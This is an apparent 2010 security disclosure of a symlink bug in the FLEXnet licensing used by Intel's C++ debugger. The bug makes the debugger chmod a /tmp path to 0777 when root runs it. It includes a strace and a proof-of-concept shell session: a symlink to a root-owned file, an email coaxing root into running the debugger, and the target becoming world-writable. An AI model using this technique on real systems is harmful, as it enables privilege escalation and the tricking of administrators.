Intel C++ And Debugger Security Bugs

`  
Full details at http://extendedsubset.com/?p=30  
  
Here's an example strace:  
  
mkdir("/tmp/FLEXnet", 0777) = -1 EEXIST (File exists)  
chmod("/tmp/FLEXnet", 0777) = ...  
  
I don't have the time to track down the full extent of it, but neither  
do I think it should be neglected.  
  
Possibly affects other stuff using this FLEXlm/FlexNet DRM solution.  
  
Save yourselves! Hopefullly, you know who you are.  
  
- Marsh  
  
/tmp$ ln -sf /tmp/couldve_bin_bash /tmp/FLEXnet  
  
/tmp$ ls -al /tmp  
total 616  
drwxrwxrwt 9 root root 4096 2010-04-20 23:22 .  
drwxr-xr-x 23 root root 4096 2009-08-05 07:00 ..  
-rw-r–r– 1 root root 0 2010-04-20 23:21 couldve_bin_bash  
lrwxrwxrwx 1 marsh marsh 21 2010-04-20 23:22 FLEXnet ->  
/tmp/couldve_bin_bash  
drwx—— 2 root root 16384 2009-04-03 21:39 lost+found  
  
/tmp$ cat | mail root  
Dear root,  
I think there’s a bug in the Intel debugger. Could you please check  
to see what version we have installed. It should print it on startup.  
K thx bye  
^D  
  
# . /opt/intel/Compiler/11.1/069/bin/iccvars.sh  
# idbc  
Intel(R) Debugger for applications running on Intel(R) 64, Version  
11.1, Build [1.2097.2.333]  
(idb) q  
#  
  
/tmp$ ls -al /tmp  
total 616  
drwxrwxrwt 9 root root 4096 2010-04-20 23:22 .  
drwxr-xr-x 23 root root 4096 2009-08-05 07:00 ..  
-rwxrwxrwx 1 root root 0 2010-04-20 23:21 couldve_bin_bash  
lrwxrwxrwx 1 marsh marsh 21 2010-04-20 23:22 FLEXnet ->  
/tmp/couldve_bin_bash  
drwx—— 2 root root 16384 2009-04-03 21:39 lost+found  
  
`